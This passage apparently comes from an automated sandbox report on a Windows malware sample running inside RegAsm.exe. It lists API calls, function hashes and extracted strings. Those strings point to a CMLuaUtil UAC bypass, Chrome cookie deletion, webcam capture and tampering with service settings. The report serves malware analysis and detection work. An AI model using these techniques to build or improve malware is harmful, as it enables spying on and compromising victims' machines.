                                                                                                                            • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                                                                            • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                                                                            • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                                                                            • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                                                                            • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                                                                                            • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                            • String ID: hpF
                                                                                                                            • API String ID: 1852769593-151379673
                                                                                                                            • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                            • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                                                                            • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                                                                            • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                                                            • _free.LIBCMT ref: 10009315
                                                                                                                            • _free.LIBCMT ref: 10009320
                                                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                                                            • _free.LIBCMT ref: 10009336
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                                                                            • _free.LIBCMT ref: 00450F48
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 00450F53
                                                                                                                            • _free.LIBCMT ref: 00450F5E
                                                                                                                            • _free.LIBCMT ref: 00450FB2
                                                                                                                            • _free.LIBCMT ref: 00450FBD
                                                                                                                            • _free.LIBCMT ref: 00450FC8
                                                                                                                            • _free.LIBCMT ref: 00450FD3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                            • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                                                                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                            • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                                                                            APIs
                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                                                                            • int.LIBCPMT ref: 00411183
                                                                                                                              • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                                                              • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                            • String ID: (mG
                                                                                                                            • API String ID: 2536120697-4059303827
                                                                                                                            • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                                                                            • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                                                                            • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                                                                            • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                                                                            • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0
                                                                                                                            • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                            • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                                                                            • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                            • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                                                                            APIs
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                                                                                                              • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                                                              • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                            • CoUninitialize.OLE32 ref: 00407629
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                            • API String ID: 3851391207-1839356972
                                                                                                                            • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                            • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                                                            • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                            • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                                                                            • GetLastError.KERNEL32 ref: 0040BAE7
                                                                                                                            Strings
                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                                                                            • UserProfile, xrefs: 0040BAAD
                                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                                                                            • [Chrome Cookies not found], xrefs: 0040BB01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                            • API String ID: 2018770650-304995407
                                                                                                                            • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                                                                            • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                                                                            • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                                                                                            • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                                                                            APIs
                                                                                                                            • __allrem.LIBCMT ref: 0043AC69
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                                                                            • __allrem.LIBCMT ref: 0043AC9C
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                                                                            • __allrem.LIBCMT ref: 0043ACD1
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1992179935-0
                                                                                                                            • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                            • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                                                                            • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                            • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                                                                              • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prologSleep
                                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                            • API String ID: 3469354165-3054508432
                                                                                                                            • Opcode ID: 3ed1f883daae910b3ef5abeda90b7d47a2f3df688b18fa09c78226e6713a338e
                                                                                                                            • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                                                                            • Opcode Fuzzy Hash: 3ed1f883daae910b3ef5abeda90b7d47a2f3df688b18fa09c78226e6713a338e
                                                                                                                            • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4189289331-0
                                                                                                                            • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                                                                            • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                                                                            • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                                                                            • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                                                                            APIs
                                                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                            • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1922816806-0
                                                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                            APIs
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3594823470-0
                                                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 493672254-0
                                                                                                                            • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                                                                            • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                                                                            • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                                                                            • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0
                                                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3160817290-0
                                                                                                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                            • _free.LIBCMT ref: 0044824C
                                                                                                                            • _free.LIBCMT ref: 00448274
                                                                                                                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                            • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                            • _abort.LIBCMT ref: 00448293
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3160817290-0
                                                                                                                            • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                            • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                                                                            • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                                                            • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                                                                            APIs
